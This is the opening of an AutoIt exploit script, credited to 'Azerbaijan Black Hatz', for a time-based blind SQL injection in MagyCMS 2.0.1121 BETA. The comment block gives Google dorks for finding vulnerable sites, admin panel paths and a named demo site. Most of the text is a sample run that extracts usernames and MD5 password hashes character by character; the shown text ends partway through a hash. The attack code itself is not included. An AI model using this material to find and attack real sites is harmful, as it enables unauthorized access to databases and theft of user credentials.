#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_Outfile=cpl.exe
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#NoTrayIcon
#include <Array.au3>
#include <Inet.au3>
#include <String.au3>
#include <File.au3>



#cs

THIS IS A COMPLETE EXPLOIT WHICH IS WRITTEN IN THE AUTOIT SCRIPTING/PROGRAMMING LANGUAGE.
THIS IS A CONSOLE APPLICATION.
ITS MAIN PURPOSE IS TO EXPLOIT A BLIND SQL INJECTION VULNERABILITY IN magy cms v 2.0.1121 BETA USING A TIME-BASED TECHNIQUE and obtain usernames + MD5 passwords.
By default it will obtain 5 usernames and the corresponding MD5 PASSWORDS from the vulnerable site.
Since it uses a time-based technique it is a really slow exploit. But it is a more convenient way than manual work;)
In fact I coded it For Fun because we always prefer manual work.


*    ANYWAYS, save it as e.g. poc.au3 and COMPILE + ENJOY)         *


#ce



#cs

============ * AZERBAIJAN BLACK HATZ PRESENTS!) * ==================

--------------------------------------------------------------------

Vulnerable Software: MagyCMS v2.0.1121 BETA (Previous and newest versions are also affected)
Vendor: http://www.emagy.com  && broncoway.com

--------------------------------------------------------------------
Vuln Type: Blind SQL injection
Exploitation technique: Time Based.
Exploit: Available
--------------------------------------------------------------------
Credits: AkaStep & BOT_25 & CAMOUFL4G3
--------------------------------------------------------------------


ShouTz to  mariaoza;)
CAMOUFL4G3 says: FreeDom is Paradise :P


DORK 1:
google+ site:am Website by Broncoway

DORK 2: google+ site:am inurl: /magycms/


Admin Panel:
site.tld/magycms/Admin/
or
site.tld/magycms/Admin/Login.php

Demo: http://www.sgp.am

--------------------------------------------------------------------

Example usage of exploit:
cmd.exe

>D:\programming1\magy_exploit\poc_HAZIR_USERNAME_DONE\x_azirmagy_exploit>cpl.exe http://192.168.0.15/learn/pwnmagyasap/

######################################################
# MagyCMS v2.0.1121 BETA Blind SQL Injection Exploit #
#         Exploitation technique: Time Based         #
#             Author: AkaStep & BOT_25               #
######################################################

----------------------------------------
[+]  Verifying your internet connection.... Please Wait...[+]
----------------------------------------

----------------------------------------
[+]  Inet Connection is OK .... [+]
----------------------------------------

----------------------------------------
[+] Verifying is Target Site Vulnerable? Please wait...[+]
----------------------------------------

----------------------------------------
[+]        Reply from target site:           [+]

----------------------------------------
[+] - - - -  * Vulnerable! * - - - -   .     [+]
----------------------------------------

[+] Trying to get average value for sleep(1) if condition is TRUE...[+]

----------------------------------------
[+]               Please wait...             [+]
----------------------------------------


----------------------------------------
[+] AVG sleep timeout FOR TRUE CONDITION IS: 1087 ms [+]
----------------------------------------

----------------------------------------
[+] AVG sleep timeout FOR FALSE CONDITION IS:  93 ms [+]
----------------------------------------

----------------------------------------
[+] Getting To Fetch Username(s) from table... Please wait... [+]
----------------------------------------
[+] TRUE AT OFFSET [0] Currently : [m]. Responce Time: 1066.51545360847 ms.  Logging to axa.txt... [+]
[+] TRUE AT OFFSET [0] Currently : [ma]. Responce Time: 1044.58516260608 ms.  Logging to axa.txt... [+]
[+] TRUE AT OFFSET [0] Currently : [man]. Responce Time: 1086.89845022196 ms.  Logging to axa.txt... [+]
[+] TRUE AT OFFSET [0] Currently : [mana]. Responce Time: 1046.11742474319 ms.  Logging to axa.txt... [+]
[+] TRUE AT OFFSET [0] Currently : [manag]. Responce Time: 1070.21242516611 ms.  Logging to axa.txt... [+]
[+] TRUE AT OFFSET [0] Currently : [manage]. Responce Time: 1063.79253086555 ms.  Logging to axa.txt... [+]
[+] TRUE AT OFFSET [0] Currently : [manager]. Responce Time: 1107.93347514309 ms.  Logging to axa.txt... [+]
[+] TRUE AT OFFSET [1] Currently : [r]. Responce Time: 1079.4193285235 ms.  Logging to axa.txt... [+]
[+] TRUE AT OFFSET [1] Currently : [ro]. Responce Time: 1092.09901537247 ms.  Logging to axa.txt... [+]
[+] TRUE AT OFFSET [1] Currently : [roo]. Responce Time: 1266.5817253381 ms.  Logging to axa.txt... [+]
[+] TRUE AT OFFSET [1] Currently : [root]. Responce Time: 1097.96913476208 ms.  Logging to axa.txt... [+]
[+] TRUE AT OFFSET [2] Currently : [d]. Responce Time: 1082.47758977717 ms.  Logging to axa.txt... [+]
[+] TRUE AT OFFSET [3] Currently : [t]. Responce Time: 1074.85995733176 ms.  Logging to axa.txt... [+]
[+] TRUE AT OFFSET [3] Currently : [te]. Responce Time: 1088.53933904958 ms.  Logging to axa.txt... [+]
[+] TRUE AT OFFSET [3] Currently : [tes]. Responce Time: 1080.99278273973 ms.  Logging to axa.txt... [+]
[+] TRUE AT OFFSET [3] Currently : [test]. Responce Time: 1073.98846265903 ms.  Logging to axa.txt... [+]

----------------------------------------
[#] Username0 => [manager]      [#]
----------------------------------------

----------------------------------------
[#] Username1 => [root]      [#]
----------------------------------------

----------------------------------------
[#] Username2 => [d]      [#]
----------------------------------------

----------------------------------------
[#] Username3 => [test]      [#]
----------------------------------------

----------------------------------------
*         Total 4 users          *
----------------------------------------

----------------------------------------
[+] END OF USERNAME FETCHING. PREVIOUS RECORDS ARE COMPLETE USERNAMES [+]
----------------------------------------

----------------------------------------
[+] GOING TO FETCH MD5 PASSWORDS. This may take few minutes too. Please wait... [+]
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [0]    [+]
Currently MD5 hash is : 0
Responce Time: 1122.93256476205 ms.
Need to fetch other: [31] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [0]    [+]
Currently MD5 hash is : 04
Responce Time: 1147.73191815969 ms.
Need to fetch other: [30] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [0]    [+]
Currently MD5 hash is : 04e
Responce Time: 1093.4105956323 ms.
Need to fetch other: [29] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [0]    [+]
Currently MD5 hash is : 04e8
Responce Time: 1086.12022668676 ms.
Need to fetch other: [28] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [0]    [+]
Currently MD5 hash is : 04e8e
Responce Time: 1088.69703233325 ms.
Need to fetch other: [27] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [0]    [+]
Currently MD5 hash is : 04e8e4
Responce Time: 1079.73130163186 ms.
Need to fetch other: [26] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [0]    [+]
Currently MD5 hash is : 04e8e47
Responce Time: 1089.67269514766 ms.
Need to fetch other: [25] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [0]    [+]
Currently MD5 hash is : 04e8e47e
Responce Time: 1120.84654283897 ms.
Need to fetch other: [24] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [0]    [+]
Currently MD5 hash is : 04e8e47e6
Responce Time: 1096.57454880375 ms.
Need to fetch other: [23] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [0]    [+]
Currently MD5 hash is : 04e8e47e68
Responce Time: 1197.06674603001 ms.
Need to fetch other: [22] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [0]    [+]
Currently MD5 hash is : 04e8e47e68a
Responce Time: 1117.15728038546 ms.
Need to fetch other: [21] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [0]    [+]
Currently MD5 hash is : 04e8e47e68a7
Responce Time: 1074.80582819299 ms.
Need to fetch other: [20] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [0]    [+]
Currently MD5 hash is : 04e8e47e68a7b
Responce Time: 1090.67017703246 ms.
Need to fetch other: [19] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [0]    [+]
Currently MD5 hash is : 04e8e47e68a7b5
Responce Time: 1095.4439395126 ms.
Need to fetch other: [18] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [0]    [+]
Currently MD5 hash is : 04e8e47e68a7b58
Responce Time: 1079.56000213028 ms.
Need to fetch other: [17] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [0]    [+]
Currently MD5 hash is : 04e8e47e68a7b585
Responce Time: 1121.39697688334 ms.
Need to fetch other: [16] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [0]    [+]
Currently MD5 hash is : 04e8e47e68a7b5859
Responce Time: 1069.7244734608 ms.
Need to fetch other: [15] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [0]    [+]
Currently MD5 hash is : 04e8e47e68a7b58594
Responce Time: 1088.90167696824 ms.
Need to fetch other: [14] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [0]    [+]
Currently MD5 hash is : 04e8e47e68a7b58594f
Responce Time: 1090.38322342555 ms.
Need to fetch other: [13] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [0]    [+]
Currently MD5 hash is : 04e8e47e68a7b58594fd
Responce Time: 1131.33884657918 ms.
Need to fetch other: [12] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [0]    [+]
Currently MD5 hash is : 04e8e47e68a7b58594fdc
Responce Time: 1085.94070681407 ms.
Need to fetch other: [11] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [0]    [+]
Currently MD5 hash is : 04e8e47e68a7b58594fdcf
Responce Time: 1086.03164216324 ms.
Need to fetch other: [10] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [0]    [+]
Currently MD5 hash is : 04e8e47e68a7b58594fdcf9
Responce Time: 1085.01732856736 ms.
Need to fetch other: [9] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [0]    [+]
Currently MD5 hash is : 04e8e47e68a7b58594fdcf99
Responce Time: 1090.81806852607 ms.
Need to fetch other: [8] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [0]    [+]
Currently MD5 hash is : 04e8e47e68a7b58594fdcf994
Responce Time: 1164.10285238106 ms.
Need to fetch other: [7] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [0]    [+]
Currently MD5 hash is : 04e8e47e68a7b58594fdcf994c
Responce Time: 1087.62590294072 ms.
Need to fetch other: [6] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [0]    [+]
Currently MD5 hash is : 04e8e47e68a7b58594fdcf994c5
Responce Time: 1084.24126538578 ms.
Need to fetch other: [5] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [0]    [+]
Currently MD5 hash is : 04e8e47e68a7b58594fdcf994c5d
Responce Time: 1110.72200045738 ms.
Need to fetch other: [4] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [0]    [+]
Currently MD5 hash is : 04e8e47e68a7b58594fdcf994c5d4
Responce Time: 1095.35167837798 ms.
Need to fetch other: [3] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [0]    [+]
Currently MD5 hash is : 04e8e47e68a7b58594fdcf994c5d49
Responce Time: 1100.45665915848 ms.
Need to fetch other: [2] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [0]    [+]
Currently MD5 hash is : 04e8e47e68a7b58594fdcf994c5d490
Responce Time: 1141.79013618122 ms.
Need to fetch other: [1] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [0]    [+]
Currently MD5 hash is : 04e8e47e68a7b58594fdcf994c5d490d
Responce Time: 1166.55627727462 ms.
Need to fetch other: [ *NONE* ] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [1]    [+]
Currently MD5 hash is : e
Responce Time: 1171.26590832908 ms.
Need to fetch other: [31] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [1]    [+]
Currently MD5 hash is : e1
Responce Time: 1132.57401498087 ms.
Need to fetch other: [30] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [1]    [+]
Currently MD5 hash is : e10
Responce Time: 1208.55810555533 ms.
Need to fetch other: [29] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [1]    [+]
Currently MD5 hash is : e10a
Responce Time: 1123.42031597051 ms.
Need to fetch other: [28] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [1]    [+]
Currently MD5 hash is : e10ad
Responce Time: 1122.12616389991 ms.
Need to fetch other: [27] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [1]    [+]
Currently MD5 hash is : e10adc
Responce Time: 1082.92028182339 ms.
Need to fetch other: [26] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [1]    [+]
Currently MD5 hash is : e10adc3
Responce Time: 1089.85126266028 ms.
Need to fetch other: [25] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [1]    [+]
Currently MD5 hash is : e10adc39
Responce Time: 1140.08007343197 ms.
Need to fetch other: [24] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [1]    [+]
Currently MD5 hash is : e10adc394
Responce Time: 1148.83027251909 ms.
Need to fetch other: [23] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [1]    [+]
Currently MD5 hash is : e10adc3949
Responce Time: 1091.6165547748 ms.
Need to fetch other: [22] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [1]    [+]
Currently MD5 hash is : e10adc3949b
Responce Time: 1087.22355838061 ms.
Need to fetch other: [21] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [1]    [+]
Currently MD5 hash is : e10adc3949ba
Responce Time: 1073.28650311553 ms.
Need to fetch other: [20] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [1]    [+]
Currently MD5 hash is : e10adc3949ba5
Responce Time: 1075.00146049429 ms.
Need to fetch other: [19] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [1]    [+]
Currently MD5 hash is : e10adc3949ba59
Responce Time: 1075.08258904097 ms.
Need to fetch other: [18] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [1]    [+]
Currently MD5 hash is : e10adc3949ba59a
Responce Time: 1103.84616628081 ms.
Need to fetch other: [17] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [1]    [+]
Currently MD5 hash is : e10adc3949ba59ab
Responce Time: 1088.21680476932 ms.
Need to fetch other: [16] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [1]    [+]
Currently MD5 hash is : e10adc3949ba59abb
Responce Time: 1091.30892994201 ms.
Need to fetch other: [15] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [1]    [+]
Currently MD5 hash is : e10adc3949ba59abbe
Responce Time: 1120.06679051525 ms.
Need to fetch other: [14] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [1]    [+]
Currently MD5 hash is : e10adc3949ba59abbe5
Responce Time: 1102.02194814024 ms.
Need to fetch other: [13] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [1]    [+]
Currently MD5 hash is : e10adc3949ba59abbe56
Responce Time: 1142.12833929081 ms.
Need to fetch other: [12] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [1]    [+]
Currently MD5 hash is : e10adc3949ba59abbe56e
Responce Time: 1103.72041465256 ms.
Need to fetch other: [11] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [1]    [+]
Currently MD5 hash is : e10adc3949ba59abbe56e0
Responce Time: 1111.04395079055 ms.
Need to fetch other: [10] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [1]    [+]
Currently MD5 hash is : e10adc3949ba59abbe56e05
Responce Time: 1214.34433706028 ms.
Need to fetch other: [9] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [1]    [+]
Currently MD5 hash is : e10adc3949ba59abbe56e057
Responce Time: 1163.34768347812 ms.
Need to fetch other: [8] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [1]    [+]
Currently MD5 hash is : e10adc3949ba59abbe56e057f
Responce Time: 1201.57191540286 ms.
Need to fetch other: [7] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [1]    [+]
Currently MD5 hash is : e10adc3949ba59abbe56e057f2
Responce Time: 1138.68858765629 ms.
Need to fetch other: [6] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [1]    [+]
Currently MD5 hash is : e10adc3949ba59abbe56e057f20
Responce Time: 1116.66783999098 ms.
Need to fetch other: [5] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [1]    [+]
Currently MD5 hash is : e10adc3949ba59abbe56e057f20f
Responce Time: 1098.96241373153 ms.
Need to fetch other: [4] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [1]    [+]
Currently MD5 hash is : e10adc3949ba59abbe56e057f20f8
Responce Time: 1130.48200572043 ms.
Need to fetch other: [3] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [1]    [+]
Currently MD5 hash is : e10adc3949ba59abbe56e057f20f88
Responce Time: 1108.71546050055 ms.
Need to fetch other: [2] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [1]    [+]
Currently MD5 hash is : e10adc3949ba59abbe56e057f20f883
Responce Time: 1116.813345572 ms.
Need to fetch other: [1] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [1]    [+]
Currently MD5 hash is : e10adc3949ba59abbe56e057f20f883e
Responce Time: 1088.2162383657 ms.
Need to fetch other: [ *NONE* ] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [2]    [+]
Currently MD5 hash is : 3
Responce Time: 1112.91223563393 ms.
Need to fetch other: [31] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [2]    [+]
Currently MD5 hash is : 32
Responce Time: 1103.2336007669 ms.
Need to fetch other: [30] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [2]    [+]
Currently MD5 hash is : 326
Responce Time: 1073.39268625061 ms.
Need to fetch other: [29] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [2]    [+]
Currently MD5 hash is : 3263
Responce Time: 1078.83931116799 ms.
Need to fetch other: [28] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [2]    [+]
Currently MD5 hash is : 32637
Responce Time: 1073.24368450567 ms.
Need to fetch other: [27] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [2]    [+]
Currently MD5 hash is : 326373
Responce Time: 1097.87935978848 ms.
Need to fetch other: [26] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [2]    [+]
Currently MD5 hash is : 326373d
Responce Time: 1156.96056540113 ms.
Need to fetch other: [25] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [2]    [+]
Currently MD5 hash is : 326373da
Responce Time: 1072.94168611591 ms.
Need to fetch other: [24] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [2]    [+]
Currently MD5 hash is : 326373da5
Responce Time: 1109.29933992676 ms.
Need to fetch other: [23] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [2]    [+]
Currently MD5 hash is : 326373da56
Responce Time: 1078.17109775162 ms.
Need to fetch other: [22] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [2]    [+]
Currently MD5 hash is : 326373da562
Responce Time: 1091.15269276676 ms.
Need to fetch other: [21] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [2]    [+]
Currently MD5 hash is : 326373da5622
Responce Time: 1076.48035788689 ms.
Need to fetch other: [20] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [2]    [+]
Currently MD5 hash is : 326373da56226
Responce Time: 1135.50237933379 ms.
Need to fetch other: [19] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [2]    [+]
Currently MD5 hash is : 326373da562269
Responce Time: 1203.56181913304 ms.
Need to fetch other: [18] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [2]    [+]
Currently MD5 hash is : 326373da5622693
Responce Time: 1090.62271190795 ms.
Need to fetch other: [17] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [2]    [+]
Currently MD5 hash is : 326373da56226931
Responce Time: 1092.65591544045 ms.
Need to fetch other: [16] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [2]    [+]
Currently MD5 hash is : 326373da562269316
Responce Time: 1100.2446888696 ms.
Need to fetch other: [15] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [2]    [+]
Currently MD5 hash is : 326373da5622693167
Responce Time: 1094.95098541072 ms.
Need to fetch other: [14] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [2]    [+]
Currently MD5 hash is : 326373da56226931679
Responce Time: 1128.80178191581 ms.
Need to fetch other: [13] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [2]    [+]
Currently MD5 hash is : 326373da562269316790
Responce Time: 1169.40833252404 ms.
Need to fetch other: [12] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [2]    [+]
Currently MD5 hash is : 326373da5622693167903
Responce Time: 1096.74959509033 ms.
Need to fetch other: [11] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [2]    [+]
Currently MD5 hash is : 326373da56226931679032
Responce Time: 1178.17792216336 ms.
Need to fetch other: [10] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [2]    [+]
Currently MD5 hash is : 326373da562269316790326
Responce Time: 1106.2009016093 ms.
Need to fetch other: [9] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [2]    [+]
Currently MD5 hash is : 326373da562269316790326c
Responce Time: 1300.28445742105 ms.
Need to fetch other: [8] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [2]    [+]
Currently MD5 hash is : 326373da562269316790326c0
Responce Time: 1092.92270156983 ms.
Need to fetch other: [7] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [2]    [+]
Currently MD5 hash is : 326373da562269316790326c00
Responce Time: 1127.17008586904 ms.
Need to fetch other: [6] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [2]    [+]
Currently MD5 hash is : 326373da562269316790326c00a
Responce Time: 1098.36618620519 ms.
Need to fetch other: [5] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [2]    [+]
Currently MD5 hash is : 326373da562269316790326c00a9
Responce Time: 1113.63942520058 ms.
Need to fetch other: [4] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [2]    [+]
Currently MD5 hash is : 326373da562269316790326c00a99
Responce Time: 1125.85533775888 ms.
Need to fetch other: [3] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [2]    [+]
Currently MD5 hash is : 326373da562269316790326c00a997
Responce Time: 1151.71279577202 ms.
Need to fetch other: [2] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [2]    [+]
Currently MD5 hash is : 326373da562269316790326c00a9972
Responce Time: 1133.74918720454 ms.
Need to fetch other: [1] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [2]    [+]
Currently MD5 hash is : 326373da562269316790326c00a9972f
Responce Time: 1126.98230301967 ms.
Need to fetch other: [ *NONE* ] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [3]    [+]
Currently MD5 hash is : 7
Responce Time: 1109.83144103983 ms.
Need to fetch other: [31] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [3]    [+]
Currently MD5 hash is : 74
Responce Time: 1098.13795060885 ms.
Need to fetch other: [30] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [3]    [+]
Currently MD5 hash is : 74a
Responce Time: 1096.22027336493 ms.
Need to fetch other: [29] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [3]    [+]
Currently MD5 hash is : 74a5
Responce Time: 1112.61976585727 ms.
Need to fetch other: [28] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [3]    [+]
Currently MD5 hash is : 74a5d
Responce Time: 1142.74313282603 ms.
Need to fetch other: [27] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [3]    [+]
Currently MD5 hash is : 74a5d1
Responce Time: 1084.91810768561 ms.
Need to fetch other: [26] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [3]    [+]
Currently MD5 hash is : 74a5d1f
Responce Time: 1112.79996992547 ms.
Need to fetch other: [25] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [3]    [+]
Currently MD5 hash is : 74a5d1ff
Responce Time: 1098.22970548891 ms.
Need to fetch other: [24] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [3]    [+]
Currently MD5 hash is : 74a5d1ffc
Responce Time: 1162.94171493733 ms.
Need to fetch other: [23] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [3]    [+]
Currently MD5 hash is : 74a5d1ffce
Responce Time: 1288.16907398647 ms.
Need to fetch other: [22] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [3]    [+]
Currently MD5 hash is : 74a5d1ffce4
Responce Time: 1141.83313523826 ms.
Need to fetch other: [21] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [3]    [+]
Currently MD5 hash is : 74a5d1ffce47
Responce Time: 1103.65852377924 ms.
Need to fetch other: [20] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [3]    [+]
Currently MD5 hash is : 74a5d1ffce472
Responce Time: 1168.90490496762 ms.
Need to fetch other: [19] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [3]    [+]
Currently MD5 hash is : 74a5d1ffce472f
Responce Time: 1096.50154288596 ms.
Need to fetch other: [18] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [3]    [+]
Currently MD5 hash is : 74a5d1ffce472f0
Responce Time: 1139.7646542839 ms.
Need to fetch other: [17] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [3]    [+]
Currently MD5 hash is : 74a5d1ffce472f02
Responce Time: 1108.4753730338 ms.
Need to fetch other: [16] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [3]    [+]
Currently MD5 hash is : 74a5d1ffce472f020
Responce Time: 1088.28836460353 ms.
Need to fetch other: [15] symbol(s).
Logging to axa.txt...
----------------------------------------

